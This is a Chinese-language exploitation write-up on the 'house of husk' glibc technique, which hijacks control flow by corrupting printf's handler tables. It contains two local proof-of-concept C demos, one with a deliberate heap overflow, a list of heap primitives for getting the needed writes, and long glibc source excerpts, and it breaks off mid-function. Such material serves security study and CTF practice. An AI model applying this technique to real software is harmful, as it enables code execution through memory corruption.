house_of_husk


基本原理

glibc源代码阅读:

https://codebrowser.dev/glibc/glibc

printf函数阅读路径:

https://codebrowser.dev/glibc/glibc/stdio-common/printf.c.html

最终经过一顿搜索找到了这个位置定义了相关函数:

https://codebrowser.dev/glibc/glibc/stdio-common/reg-printf.c.html#27

从上图中可以看出__register_printf_function函数是对__register_printf_specifier函数的一个封装;

__register_printf_specifier源代码如下:

__register_printf_specifier (int spec, printf_function converter,
printf_arginfo_size_function arginfo)
{
  /* Reject specifiers outside the single-byte range before taking the lock.  */
  if (spec < 0 || spec > (int) UCHAR_MAX)
    {
      __set_errno (EINVAL);
      return -1;
    }

  int status = 0;
  __libc_lock_lock (lock);

  /* Both tables live in one zeroed block allocated on first use: the
     arginfo table occupies the first UCHAR_MAX + 1 slots and the
     function table the following UCHAR_MAX + 1 slots.  */
  if (__printf_function_table == NULL)
    {
      void *block = calloc (UCHAR_MAX + 1, sizeof (void *) * 2);
      if (block == NULL)
        {
          status = -1;
          goto out;
        }
      __printf_arginfo_table = (printf_arginfo_size_function **) block;
      __printf_function_table = (printf_function **)
        (__printf_arginfo_table + UCHAR_MAX + 1);
    }

  /* Install the handler pair for this specifier; a later call for the
     same SPEC simply overwrites both slots.  */
  __printf_function_table[spec] = converter;
  __printf_arginfo_table[spec] = arginfo;

out:
  __libc_lock_unlock (lock);
  return status;
}

其中spec应该就是占位符,其合法范围是0~0xff;

首先是为两张表一次性分配空间,根据calloc的函数原型,我们可以知道其分配了0x100 * 2个指针的空间;然后将前0x100个指针给了__printf_arginfo_table, 后0x100个指针的空间给了__printf_function_table;

然后对应字符的空间分别赋值,值为传递进来的converter和arginfo;

下面关注printf的执行过程,在printf中调用了__vfprintf_internal

__vfprintf_internal中调用了printf_positional:

printf_positional中有如下调用:

printf_positional中调用了__parse_one_specmb函数:

__parse_one_specmb中也有对函数表的调用:

调用条件探索

首先笔者对调用链的触发条件进行盲测:

笔者使用的格式化字符串是:

/* 'hello%w' */

可以成功得到以下调链:

源代码分析得到如下流程:

__parse_one_specmb的过程大致如下:

最终到达目标地址:

因此我们只需要利用堆漏洞,使得__printf_function_table和__printf_arginfo_table均不为NULL,且__printf_arginfo_table中对应占位符的函数指针不为空,即可实现控制流的劫持;

可见劫持控制流成功:

demo如下:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(){
/* Local demonstration only.  libc_base is derived from printf's address
   with a build-specific offset, so every constant below is tied to the
   one glibc binary the author used (offsets are taken from the page and
   are not verified here).
   NOTE(review): subtracting an integer from &printf is pointer arithmetic
   on a function pointer, and storing the result in size_t is an implicit
   pointer-to-integer conversion; both rely on GNU extensions / warnings
   being ignored rather than on portable C.  */
size_t libc_base = &printf - 0x0606f0;
/* Addresses of the two handler tables that vfprintf consults.  */
size_t __printf_function_table = libc_base + 0x21c9c8;
size_t __printf_arginfo_table = libc_base + 0x21b8b0;
/* Make both table pointers non-NULL so vfprintf leaves the fast path and
   enters the positional (table-driven) path.  */
*(void **)__printf_function_table = malloc(0x400);
*(void **)__printf_arginfo_table = malloc(0x400);
/* Fill the arginfo slot for 'w' (0x77) with a non-pointer byte pattern;
   the parser only checks that the slot is non-NULL before calling it.
   NOTE(review): arithmetic on a void * (adding 0x77*8) is a GNU extension.  */
memset(*(void **)__printf_arginfo_table+0x77*8, 'a', 8);
/* '%w' is not a built-in conversion, so only the table entry handles it.  */
printf("Hello%w");
}

攻击模型优化

攻击模型1

上述模型的攻击条件是:

  1. __printf_function_table != 0;
  2. __printf_arginfo_table != 0;
  3. (size_t *)__printf_arginfo_table[chr] == goal;
  4. printf中有占位符;

__malloc_assert方法

__malloc_assert的调用链如下:

__malloc_assert()
__fxprintf()
locked_vfxprintf()
__vfprintf_internal()

找到__fxprintf定义的位置:

https://codebrowser.dev/glibc/glibc/stdio-common/fxprintf.c.html

下面总结一下__malloc_assert中关于格式化字符串解析的调用链:

__malloc_assert()
__fxprintf()
__vfxprintf()
locked_vfxprintf()
__vfprintf_internal() <==> vfprintf()
vfprintf()
do_positional

__malloc_assert路径:

https://codebrowser.dev/glibc/glibc/malloc/malloc.c.html

通过逆向汇编代码看出来__malloc_assert 是无条件调用__fxprintf的:

下面是fxprintf到do_positional的过程:

利用__malloc_assert触发成功:

demo如下:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(){
/* Local demonstration only.  As in the first demo, libc_base and the two
   table addresses are fixed offsets for one specific glibc build (values
   taken from the page, not verified here).
   NOTE(review): &printf - 0x0606f0 is pointer arithmetic on a function
   pointer followed by an implicit pointer-to-integer conversion; this
   relies on GNU extensions rather than portable C.  */
size_t libc_base = &printf - 0x0606f0;
size_t __printf_function_table = libc_base + 0x21c9c8;
size_t __printf_arginfo_table = libc_base + 0x21b8b0;
/* Make both table pointers non-NULL so vfprintf takes the positional path.  */
*(void **)__printf_function_table = malloc(0x400);
*(void **)__printf_arginfo_table = malloc(0x400);
/* Every arginfo slot is filled with the same byte pattern, so whichever
   specifier __malloc_assert's format string uses hits a non-NULL entry.  */
memset(*(void **)__printf_arginfo_table, 'a', 0x400);
char *a = malloc(0x40);
/* These three stores land past the end of the 0x40-byte allocation; this
   out-of-bounds write is deliberate in the demo so that the following
   malloc's consistency check fails and __malloc_assert is reached.
   NOTE(review): "\x55" is a string literal (a pointer), not a char — the
   neighbouring lines use char literals, so '\x55' was presumably intended.  */
a[0x48] = "\x55";
a[0x49] = '\x00';
a[0x4a] = '\x00';
/* Triggers the assertion path; its formatted message is what walks the
   corrupted table (call chain described above in the text).  */
malloc(0x60);
}

攻击模型2

因此攻击模型可以优化为:

  1. __printf_function_table != 0;
  2. __printf_arginfo_table != 0;
  3. (size_t *)__printf_arginfo_table[chr] == goal;
  4. __malloc_assert;

前三个攻击条件分析总结

前三个攻击条件基本可以总结为两次任意libc地址写,其中一次较弱(__printf_function_table似乎写入任意非零数据即可),另一次较强,需要写入可控地址;

可用方法如下:

  1. 两次largebin attack;(或者__printf_function_table用tcache_unlink_smashing、__printf_arginfo_table用largebin_attack);
  2. darknote的乘法溢出,然后任意libc地址空间分配堆地址;
  3. 攻击global_fast_max,然后free过去,需要同时有UAF;
  4. 其他任意地址写;

定位

函数:register_printf_function

在IDA中能找到:

例题

SUtext

附录

calloc函数原型

printf_positional源代码:

/* Slow path of vfprintf.  Parses every remaining specifier of FORMAT
   into SPECS, determines the type of each argument, fetches the
   argument values, and finally emits each specifier.  The caller enters
   this path whenever any printf handler table is non-NULL, so the table
   entries consulted here (__printf_arginfo_table, __printf_function_table,
   __printf_va_arg_table) are used as trusted function pointers: the only
   guards are a NULL test on the slot and a range test on the specifier
   byte.  Returns the accumulated character count in DONE, or -1 on
   error.  */
static int
printf_positional (FILE *s, const CHAR_T *format, int readonly_format,
va_list ap, va_list *ap_savep, int done, int nspecs_done,
const UCHAR_T *lead_str_end,
CHAR_T *work_buffer, int save_errno,
const char *grouping, THOUSANDS_SEP_T thousands_sep,
unsigned int mode_flags)
{
/* For positional argument handling. */
struct scratch_buffer specsbuf;
scratch_buffer_init (&specsbuf);
struct printf_spec *specs = specsbuf.data;
size_t specs_limit = specsbuf.length / sizeof (specs[0]);
/* Used as a backing store for args_value, args_size, args_type
below. */
struct scratch_buffer argsbuf;
scratch_buffer_init (&argsbuf);
/* Array with information about the needed arguments. This has to
be dynamically extensible. */
size_t nspecs = 0;
/* The number of arguments the format string requests. This will
determine the size of the array needed to store the argument
attributes. */
size_t nargs = 0;
/* Positional parameters refer to arguments directly. This could
also determine the maximum number of arguments. Track the
maximum number. */
size_t max_ref_arg = 0;
/* Just a counter. */
size_t cnt;
/* (const char *) -1 is the caller's "not looked up yet" marker for the
   locale grouping data; resolve it now.  */
if (grouping == (const char *) -1)
{
#ifdef COMPILE_WPRINTF
thousands_sep = _NL_CURRENT_WORD (LC_NUMERIC,
_NL_NUMERIC_THOUSANDS_SEP_WC);
#else
thousands_sep = _NL_CURRENT (LC_NUMERIC, THOUSANDS_SEP);
#endif
grouping = _NL_CURRENT (LC_NUMERIC, GROUPING);
if (*grouping == '\0' || *grouping == CHAR_MAX)
grouping = NULL;
}
/* Pass 1: parse every specifier from the first one onwards, growing
   SPECS as needed.  Each parse may itself call into
   __printf_arginfo_table (see __parse_one_specmb).  */
for (const UCHAR_T *f = lead_str_end; *f != L_('\0');
f = specs[nspecs++].next_fmt)
{
if (nspecs == specs_limit)
{
if (!scratch_buffer_grow_preserve (&specsbuf))
{
done = -1;
goto all_done;
}
specs = specsbuf.data;
specs_limit = specsbuf.length / sizeof (specs[0]);
}
/* Parse the format specifier. */
#ifdef COMPILE_WPRINTF
nargs += __parse_one_specwc (f, nargs, &specs[nspecs], &max_ref_arg);
#else
nargs += __parse_one_specmb (f, nargs, &specs[nspecs], &max_ref_arg);
#endif
}
/* Determine the number of arguments the format string consumes. */
nargs = MAX (nargs, max_ref_arg);
union printf_arg *args_value;
int *args_size;
int *args_type;
{
/* Calculate total size needed to represent a single argument
across all three argument-related arrays. */
size_t bytes_per_arg
= sizeof (*args_value) + sizeof (*args_size) + sizeof (*args_type);
if (!scratch_buffer_set_array_size (&argsbuf, nargs, bytes_per_arg))
{
done = -1;
goto all_done;
}
args_value = argsbuf.data;
/* Set up the remaining two arrays to each point past the end of
the prior array, since space for all three has been allocated
now. */
args_size = &args_value[nargs].pa_int;
args_type = &args_size[nargs];
/* Under PRINTF_FORTIFY unknown types start as -1 so that an argument
   never assigned a type is caught below instead of silently read.  */
memset (args_type, (mode_flags & PRINTF_FORTIFY) != 0 ? '\xff' : '\0',
nargs * sizeof (*args_type));
}
/* XXX Could do sanity check here: If any element in ARGS_TYPE is
still zero after this loop, format is invalid. For now we
simply use 0 as the value. */
/* Pass 2: fill in the types of all the arguments. */
for (cnt = 0; cnt < nspecs; ++cnt)
{
/* If the width is determined by an argument this is an int. */
if (specs[cnt].width_arg != -1)
args_type[specs[cnt].width_arg] = PA_INT;
/* If the precision is determined by an argument this is an int. */
if (specs[cnt].prec_arg != -1)
args_type[specs[cnt].prec_arg] = PA_INT;
switch (specs[cnt].ndata_args)
{
case 0: /* No arguments. */
break;
case 1: /* One argument; we already have the
type and size. */
args_type[specs[cnt].data_arg] = specs[cnt].data_arg_type;
args_size[specs[cnt].data_arg] = specs[cnt].size;
break;
default:
/* We have more than one argument for this format spec.
We must call the arginfo function again to determine
all the types.  This is an unguarded indirect call through
the arginfo table entry: the slot was found non-NULL during
parsing and is not re-validated here.  */
(void) (*__printf_arginfo_table[specs[cnt].info.spec])
(&specs[cnt].info,
specs[cnt].ndata_args, &args_type[specs[cnt].data_arg],
&args_size[specs[cnt].data_arg]);
break;
}
}
/* Pass 3: now we know all the types and the order. Fill in the
   argument values by walking the saved va_list.  */
for (cnt = 0; cnt < nargs; ++cnt)
switch (args_type[cnt])
{
#define T(tag, mem, type) \
case tag: \
args_value[cnt].mem = va_arg (*ap_savep, type); \
break
T (PA_WCHAR, pa_wchar, wint_t);
case PA_CHAR: /* Promoted. */
case PA_INT|PA_FLAG_SHORT: /* Promoted. */
#if LONG_MAX == INT_MAX
case PA_INT|PA_FLAG_LONG:
#endif
T (PA_INT, pa_int, int);
#if LONG_MAX == LONG_LONG_MAX
case PA_INT|PA_FLAG_LONG:
#endif
T (PA_INT|PA_FLAG_LONG_LONG, pa_long_long_int, long long int);
#if LONG_MAX != INT_MAX && LONG_MAX != LONG_LONG_MAX
# error "he?"
#endif
case PA_FLOAT: /* Promoted. */
T (PA_DOUBLE, pa_double, double);
case PA_DOUBLE|PA_FLAG_LONG_DOUBLE:
if (__glibc_unlikely ((mode_flags & PRINTF_LDBL_IS_DBL) != 0))
{
args_value[cnt].pa_double = va_arg (*ap_savep, double);
args_type[cnt] &= ~PA_FLAG_LONG_DOUBLE;
}
#if __HAVE_FLOAT128_UNLIKE_LDBL
else if ((mode_flags & PRINTF_LDBL_USES_FLOAT128) != 0)
args_value[cnt].pa_float128 = va_arg (*ap_savep, _Float128);
#endif
else
args_value[cnt].pa_long_double = va_arg (*ap_savep, long double);
break;
case PA_STRING: /* All pointers are the same */
case PA_WSTRING: /* All pointers are the same */
T (PA_POINTER, pa_pointer, void *);
#undef T
default:
/* User-registered argument types dispatch through a third table,
   __printf_va_arg_table, indexed by (type - PA_LAST); the index is
   not bounds-checked here beyond the NULL test on the slot.  */
if ((args_type[cnt] & PA_FLAG_PTR) != 0)
args_value[cnt].pa_pointer = va_arg (*ap_savep, void *);
else if (__glibc_unlikely (__printf_va_arg_table != NULL)
&& __printf_va_arg_table[args_type[cnt] - PA_LAST] != NULL)
{
args_value[cnt].pa_user = alloca (args_size[cnt]);
(*__printf_va_arg_table[args_type[cnt] - PA_LAST])
(args_value[cnt].pa_user, ap_savep);
}
else
memset (&args_value[cnt], 0, sizeof (args_value[cnt]));
break;
case -1:
/* Error case. Not all parameters appear in N$ format
strings. We have no way to determine their type. */
assert ((mode_flags & PRINTF_FORTIFY) != 0);
__libc_fatal ("*** invalid %N$ use detected ***\n");
}
/* Pass 4: now walk through all format specifiers and process them. */
for (; (size_t) nspecs_done < nspecs; ++nspecs_done)
{
STEP4_TABLE;
int is_negative;
union
{
unsigned long long int longlong;
unsigned long int word;
} number;
int base;
CHAR_T *string; /* Pointer to argument string. */
/* Fill variables from values in struct. */
int alt = specs[nspecs_done].info.alt;
int space = specs[nspecs_done].info.space;
int left = specs[nspecs_done].info.left;
int showsign = specs[nspecs_done].info.showsign;
int group = specs[nspecs_done].info.group;
int is_long_double __attribute__ ((unused))
= specs[nspecs_done].info.is_long_double;
int is_short = specs[nspecs_done].info.is_short;
int is_char = specs[nspecs_done].info.is_char;
int is_long = specs[nspecs_done].info.is_long;
int width = specs[nspecs_done].info.width;
int prec = specs[nspecs_done].info.prec;
int use_outdigits = specs[nspecs_done].info.i18n;
char pad = specs[nspecs_done].info.pad;
CHAR_T spec = specs[nspecs_done].info.spec;
CHAR_T *workend = work_buffer + WORK_BUFFER_SIZE;
/* Fill in last information. */
if (specs[nspecs_done].width_arg != -1)
{
/* Extract the field width from an argument. */
specs[nspecs_done].info.width =
args_value[specs[nspecs_done].width_arg].pa_int;
if (specs[nspecs_done].info.width < 0)
/* If the width value is negative left justification is
selected and the value is taken as being positive. */
{
specs[nspecs_done].info.width *= -1;
left = specs[nspecs_done].info.left = 1;
}
width = specs[nspecs_done].info.width;
}
if (specs[nspecs_done].prec_arg != -1)
{
/* Extract the precision from an argument. */
specs[nspecs_done].info.prec =
args_value[specs[nspecs_done].prec_arg].pa_int;
if (specs[nspecs_done].info.prec < 0)
/* If the precision is negative the precision is
omitted. */
specs[nspecs_done].info.prec = -1;
prec = specs[nspecs_done].info.prec;
}
/* Process format specifiers. */
while (1)
{
extern printf_function **__printf_function_table;
int function_done;
/* A registered converter takes precedence over the built-in
   handling of SPEC.  The checks before the indirect call are only
   that SPEC fits the table and that the slot is non-NULL; the
   pointer value itself is not validated.  */
if (spec <= UCHAR_MAX
&& __printf_function_table != NULL
&& __printf_function_table[(size_t) spec] != NULL)
{
const void **ptr = alloca (specs[nspecs_done].ndata_args
* sizeof (const void *));
/* Fill in an array of pointers to the argument values. */
for (unsigned int i = 0; i < specs[nspecs_done].ndata_args;
++i)
ptr[i] = &args_value[specs[nspecs_done].data_arg + i];
/* Call the function. */
function_done = __printf_function_table[(size_t) spec]
(s, &specs[nspecs_done].info, ptr);
/* -2 is the converter's "not handled, fall back" signal;
   anything else ends this specifier.  */
if (function_done != -2)
{
/* If an error occurred we don't have information
about # of chars. */
if (function_done < 0)
{
/* Function has set errno. */
done = -1;
goto all_done;
}
done_add (function_done);
break;
}
}
/* Built-in conversions: JUMP dispatches on SPEC through the
   step4 table (macro-defined elsewhere in the file).  */
JUMP (spec, step4_jumps);
#define process_arg_data args_value[specs[nspecs_done].data_arg]
#define process_arg_int() process_arg_data.pa_int
#define process_arg_long_int() process_arg_data.pa_long_int
#define process_arg_long_long_int() process_arg_data.pa_long_long_int
#define process_arg_pointer() process_arg_data.pa_pointer
#define process_arg_string() process_arg_data.pa_string
#define process_arg_unsigned_int() process_arg_data.pa_u_int
#define process_arg_unsigned_long_int() process_arg_data.pa_u_long_int
#define process_arg_unsigned_long_long_int() process_arg_data.pa_u_long_long_int
#define process_arg_wchar_t() process_arg_data.pa_wchar
#define process_arg_wstring() process_arg_data.pa_wstring
process_arg ();
process_string_arg ();
#undef process_arg_data
#undef process_arg_int
#undef process_arg_long_int
#undef process_arg_long_long_int
#undef process_arg_pointer
#undef process_arg_string
#undef process_arg_unsigned_int
#undef process_arg_unsigned_long_int
#undef process_arg_unsigned_long_long_int
#undef process_arg_wchar_t
#undef process_arg_wstring
LABEL (form_float):
LABEL (form_floathex):
{
const void *ptr
= (const void *) &args_value[specs[nspecs_done].data_arg];
if (__glibc_unlikely ((mode_flags & PRINTF_LDBL_IS_DBL) != 0))
{
specs[nspecs_done].data_arg_type = PA_DOUBLE;
specs[nspecs_done].info.is_long_double = 0;
}
SETUP_FLOAT128_INFO (specs[nspecs_done].info);
int function_done
= __printf_fp_spec (s, &specs[nspecs_done].info, &ptr);
if (function_done < 0)
{
/* Error in print handler; up to handler to set errno. */
done = -1;
goto all_done;
}
done_add (function_done);
}
break;
/* Unknown specifier with no registered converter: printf_unknown
   renders it literally.  */
LABEL (form_unknown):
{
unsigned int i;
const void **ptr;
ptr = alloca (specs[nspecs_done].ndata_args
* sizeof (const void *));
/* Fill in an array of pointers to the argument values. */
for (i = 0; i < specs[nspecs_done].ndata_args; ++i)
ptr[i] = &args_value[specs[nspecs_done].data_arg + i];
/* Call the function. */
function_done = printf_unknown (s, &specs[nspecs_done].info,
ptr);
/* If an error occurred we don't have information about #
of chars. */
if (function_done < 0)
{
/* Function has set errno. */
done = -1;
goto all_done;
}
done_add (function_done);
}
break;
}
/* Write the following constant string. */
outstring (specs[nspecs_done].end_of_fmt,
specs[nspecs_done].next_fmt
- specs[nspecs_done].end_of_fmt);
}
/* Single exit: both scratch buffers are released on every path.  */
all_done:
scratch_buffer_free (&argsbuf);
scratch_buffer_free (&specsbuf);
return done;
}

__vfprintf_internal源代码:

/* The function itself: the core of vfprintf.  Writes FORMAT with the
   arguments in AP to stream S and returns the number of characters
   written, or -1 on error (EOF for a wrongly oriented stream).  The
   fast path below handles each specifier inline through JUMP tables;
   the positional slow path (printf_positional) is taken for N$
   arguments, for specifiers the fast path does not know, and — checked
   once up front — whenever any printf handler table is non-NULL.  */
int
vfprintf (FILE *s, const CHAR_T *format, va_list ap, unsigned int mode_flags)
{
/* The character used as thousands separator. */
THOUSANDS_SEP_T thousands_sep = 0;
/* The string describing the size of groups of digits. */
const char *grouping;
/* Place to accumulate the result. */
int done;
/* Current character in format string. */
const UCHAR_T *f;
/* End of leading constant string. */
const UCHAR_T *lead_str_end;
/* Points to next format specifier. */
const UCHAR_T *end_of_spec;
/* Buffer intermediate results. */
CHAR_T work_buffer[WORK_BUFFER_SIZE];
CHAR_T *workend;
/* We have to save the original argument pointer. */
va_list ap_save;
/* Count number of specifiers we already processed. */
int nspecs_done;
/* For the %m format we may need the current `errno' value. */
int save_errno = errno;
/* 1 if format is in read-only memory, -1 if it is in writable memory,
0 if unknown. */
int readonly_format = 0;
/* Orient the stream. */
#ifdef ORIENT
ORIENT;
#endif
/* Sanity check of arguments. */
ARGCHECK (s, format);
#ifdef ORIENT
/* Check for correct orientation. */
if (_IO_vtable_offset (s) == 0
&& _IO_fwide (s, sizeof (CHAR_T) == 1 ? -1 : 1)
!= (sizeof (CHAR_T) == 1 ? -1 : 1))
/* The stream is already oriented otherwise. */
return EOF;
#endif
if (UNBUFFERED_P (s))
/* Use a helper function which will allocate a local temporary buffer
for the stream and then call us again. */
return buffered_vfprintf (s, format, ap, mode_flags);
/* Initialize local variables. */
done = 0;
/* -1 marks the locale grouping data as "not looked up yet".  */
grouping = (const char *) -1;
#ifdef __va_copy
/* This macro will be available soon in gcc's <stdarg.h>. We need it
since on some systems `va_list' is not an integral type. */
__va_copy (ap_save, ap);
#else
ap_save = ap;
#endif
nspecs_done = 0;
#ifdef COMPILE_WPRINTF
/* Find the first format specifier. */
f = lead_str_end = __find_specwc ((const UCHAR_T *) format);
#else
/* Find the first format specifier. */
f = lead_str_end = __find_specmb ((const UCHAR_T *) format);
#endif
/* Lock stream. */
_IO_cleanup_region_start ((void (*) (void *)) &_IO_funlockfile, s);
_IO_flockfile (s);
/* Write the literal text before the first format. */
outstring ((const UCHAR_T *) format,
lead_str_end - (const UCHAR_T *) format);
/* If we only have to print a simple string, return now. */
if (*f == L_('\0'))
goto all_done;
/* Use the slow path in case any printf handler is registered.  A
   non-NULL table pointer is the sole criterion here; nothing verifies
   that the table was installed through register_printf_function.  */
if (__glibc_unlikely (__printf_function_table != NULL
|| __printf_modifier_table != NULL
|| __printf_va_arg_table != NULL))
goto do_positional;
/* Process whole format string: one iteration per specifier, with
   flags, width, precision and modifiers parsed by jumping between the
   labels below.  */
do
{
STEP0_3_TABLE;
STEP4_TABLE;
int is_negative; /* Flag for negative number. */
union
{
unsigned long long int longlong;
unsigned long int word;
} number;
int base;
union printf_arg the_arg;
CHAR_T *string; /* Pointer to argument string. */
int alt = 0; /* Alternate format. */
int space = 0; /* Use space prefix if no sign is needed. */
int left = 0; /* Left-justify output. */
int showsign = 0; /* Always begin with plus or minus sign. */
int group = 0; /* Print numbers according grouping rules. */
/* Argument is long double/long long int. Only used if
double/long double or long int/long long int are distinct. */
int is_long_double __attribute__ ((unused)) = 0;
int is_short = 0; /* Argument is short int. */
int is_long = 0; /* Argument is long int. */
int is_char = 0; /* Argument is promoted (unsigned) char. */
int width = 0; /* Width of output; 0 means none specified. */
int prec = -1; /* Precision of output; -1 means none specified. */
/* This flag is set by the 'I' modifier and selects the use of the
`outdigits' as determined by the current locale. */
int use_outdigits = 0;
UCHAR_T pad = L_(' ');/* Padding character. */
CHAR_T spec;
workend = work_buffer + WORK_BUFFER_SIZE;
/* Get current character in format string.  JUMP and LABEL are
   table-dispatch macros defined elsewhere in the file.  */
JUMP (*++f, step0_jumps);
/* ' ' flag. */
LABEL (flag_space):
space = 1;
JUMP (*++f, step0_jumps);
/* '+' flag. */
LABEL (flag_plus):
showsign = 1;
JUMP (*++f, step0_jumps);
/* The '-' flag. */
LABEL (flag_minus):
left = 1;
pad = L_(' ');
JUMP (*++f, step0_jumps);
/* The '#' flag. */
LABEL (flag_hash):
alt = 1;
JUMP (*++f, step0_jumps);
/* The '0' flag. */
LABEL (flag_zero):
if (!left)
pad = L_('0');
JUMP (*++f, step0_jumps);
/* The '\'' flag. */
LABEL (flag_quote):
group = 1;
if (grouping == (const char *) -1)
{
#ifdef COMPILE_WPRINTF
thousands_sep = _NL_CURRENT_WORD (LC_NUMERIC,
_NL_NUMERIC_THOUSANDS_SEP_WC);
#else
thousands_sep = _NL_CURRENT (LC_NUMERIC, THOUSANDS_SEP);
#endif
grouping = _NL_CURRENT (LC_NUMERIC, GROUPING);
if (*grouping == '\0' || *grouping == CHAR_MAX
#ifdef COMPILE_WPRINTF
|| thousands_sep == L'\0'
#else
|| *thousands_sep == '\0'
#endif
)
grouping = NULL;
}
JUMP (*++f, step0_jumps);
LABEL (flag_i18n):
use_outdigits = 1;
JUMP (*++f, step0_jumps);
/* Get width from argument. */
LABEL (width_asterics):
{
const UCHAR_T *tmp; /* Temporary value. */
tmp = ++f;
if (ISDIGIT (*tmp))
{
int pos = read_int (&tmp);
/* read_int returns -1 on overflow of the numeric field.  */
if (pos == -1)
{
__set_errno (EOVERFLOW);
done = -1;
goto all_done;
}
if (pos && *tmp == L_('$'))
/* The width comes from a positional parameter. */
goto do_positional;
}
width = va_arg (ap, int);
/* Negative width means left justified. */
if (width < 0)
{
width = -width;
pad = L_(' ');
left = 1;
}
}
JUMP (*f, step1_jumps);
/* Given width in format string. */
LABEL (width):
width = read_int (&f);
if (__glibc_unlikely (width == -1))
{
__set_errno (EOVERFLOW);
done = -1;
goto all_done;
}
if (*f == L_('$'))
/* Oh, oh. The argument comes from a positional parameter. */
goto do_positional;
JUMP (*f, step1_jumps);
LABEL (precision):
++f;
if (*f == L_('*'))
{
const UCHAR_T *tmp; /* Temporary value. */
tmp = ++f;
if (ISDIGIT (*tmp))
{
int pos = read_int (&tmp);
if (pos == -1)
{
__set_errno (EOVERFLOW);
done = -1;
goto all_done;
}
if (pos && *tmp == L_('$'))
/* The precision comes from a positional parameter. */
goto do_positional;
}
prec = va_arg (ap, int);
/* If the precision is negative the precision is omitted. */
if (prec < 0)
prec = -1;
}
else if (ISDIGIT (*f))
{
prec = read_int (&f);
/* The precision was specified in this case as an extremely
large positive value. */
if (prec == -1)
{
__set_errno (EOVERFLOW);
done = -1;
goto all_done;
}
}
else
prec = 0;
JUMP (*f, step2_jumps);
/* Process 'h' modifier. There might another 'h' following. */
LABEL (mod_half):
is_short = 1;
JUMP (*++f, step3a_jumps);
/* Process 'hh' modifier. */
LABEL (mod_halfhalf):
is_short = 0;
is_char = 1;
JUMP (*++f, step4_jumps);
/* Process 'l' modifier. There might another 'l' following. */
LABEL (mod_long):
is_long = 1;
JUMP (*++f, step3b_jumps);
/* Process 'L', 'q', or 'll' modifier. No other modifier is
allowed to follow. */
LABEL (mod_longlong):
is_long_double = 1;
is_long = 1;
JUMP (*++f, step4_jumps);
LABEL (mod_size_t):
is_long_double = sizeof (size_t) > sizeof (unsigned long int);
is_long = sizeof (size_t) > sizeof (unsigned int);
JUMP (*++f, step4_jumps);
LABEL (mod_ptrdiff_t):
is_long_double = sizeof (ptrdiff_t) > sizeof (unsigned long int);
is_long = sizeof (ptrdiff_t) > sizeof (unsigned int);
JUMP (*++f, step4_jumps);
LABEL (mod_intmax_t):
is_long_double = sizeof (intmax_t) > sizeof (unsigned long int);
is_long = sizeof (intmax_t) > sizeof (unsigned int);
JUMP (*++f, step4_jumps);
/* Process current format.  In the fast path the argument accessors
   read directly from AP, unlike the positional path which reads from
   a pre-filled args_value array.  */
while (1)
{
#define process_arg_int() va_arg (ap, int)
#define process_arg_long_int() va_arg (ap, long int)
#define process_arg_long_long_int() va_arg (ap, long long int)
#define process_arg_pointer() va_arg (ap, void *)
#define process_arg_string() va_arg (ap, const char *)
#define process_arg_unsigned_int() va_arg (ap, unsigned int)
#define process_arg_unsigned_long_int() va_arg (ap, unsigned long int)
#define process_arg_unsigned_long_long_int() va_arg (ap, unsigned long long int)
#define process_arg_wchar_t() va_arg (ap, wchar_t)
#define process_arg_wstring() va_arg (ap, const wchar_t *)
process_arg ();
process_string_arg ();
#undef process_arg_int
#undef process_arg_long_int
#undef process_arg_long_long_int
#undef process_arg_pointer
#undef process_arg_string
#undef process_arg_unsigned_int
#undef process_arg_unsigned_long_int
#undef process_arg_unsigned_long_long_int
#undef process_arg_wchar_t
#undef process_arg_wstring
LABEL (form_float):
LABEL (form_floathex):
{
if (__glibc_unlikely ((mode_flags & PRINTF_LDBL_IS_DBL) != 0))
is_long_double = 0;
struct printf_info info =
{
.prec = prec,
.width = width,
.spec = spec,
.is_long_double = is_long_double,
.is_short = is_short,
.is_long = is_long,
.alt = alt,
.space = space,
.left = left,
.showsign = showsign,
.group = group,
.pad = pad,
.extra = 0,
.i18n = use_outdigits,
.wide = sizeof (CHAR_T) != 1,
.is_binary128 = 0
};
PARSE_FLOAT_VA_ARG_EXTENDED (info);
const void *ptr = &the_arg;
int function_done = __printf_fp_spec (s, &info, &ptr);
if (function_done < 0)
{
done = -1;
goto all_done;
}
done_add (function_done);
}
break;
/* A specifier the fast path cannot handle: either a truncated format
   (error) or something only the positional path can resolve.  */
LABEL (form_unknown):
if (spec == L_('\0'))
{
/* The format string ended before the specifier is complete. */
__set_errno (EINVAL);
done = -1;
goto all_done;
}
/* If we are in the fast loop force entering the complicated
one. */
goto do_positional;
}
/* The format is correctly handled. */
++nspecs_done;
/* Look for next format specifier. */
#ifdef COMPILE_WPRINTF
f = __find_specwc ((end_of_spec = ++f));
#else
f = __find_specmb ((end_of_spec = ++f));
#endif
/* Write the following constant string. */
outstring (end_of_spec, f - end_of_spec);
}
while (*f != L_('\0'));
/* Unlock stream and return. */
goto all_done;
/* Hand off processing for positional parameters.  The saved copy of
   the argument list (ap_save) lets the slow path re-read arguments
   the fast path may already have consumed.  */
do_positional:
done = printf_positional (s, format, readonly_format, ap, &ap_save,
done, nspecs_done, lead_str_end, work_buffer,
save_errno, grouping, thousands_sep, mode_flags);
all_done:
/* Unlock the stream. */
_IO_funlockfile (s);
_IO_cleanup_region_end (0);
return done;
}

__parse_one_specmb源代码


/* Parse one conversion specification, starting at the '%' in FORMAT,
   into SPEC.  POSN is the index of the next sequential argument;
   MAX_REF_ARG is raised to the highest N$ position seen.  Returns the
   number of sequential (non-positional) arguments this specifier
   consumes.  If __printf_function_table is non-NULL, the arginfo
   callback found in __printf_arginfo_table for the specifier character
   is invoked here to learn the argument types; only a NULL test guards
   that indirect call.  (The preceding #ifdef with the return type is not
   part of this excerpt.)  */
__parse_one_specmb (const UCHAR_T *format, size_t posn,
struct printf_spec *spec, size_t *max_ref_arg)
#endif
{
unsigned int n;
size_t nargs = 0;
/* Skip the '%'. */
++format;
/* Clear information structure. */
spec->data_arg = -1;
spec->info.alt = 0;
spec->info.space = 0;
spec->info.left = 0;
spec->info.showsign = 0;
spec->info.group = 0;
spec->info.i18n = 0;
spec->info.extra = 0;
spec->info.pad = ' ';
spec->info.wide = sizeof (UCHAR_T) > 1;
spec->info.is_binary128 = 0;
/* Test for positional argument. */
if (ISDIGIT (*format)) // ISDIGIT is a macro that checks whether the given character is a digit
{
const UCHAR_T *begin = format;
n = read_int (&format);// read an integer from the string; -1 signals overflow
if (n != 0 && *format == L_('$'))
/* Is positional parameter. */
{
++format; /* Skip the '$'. */
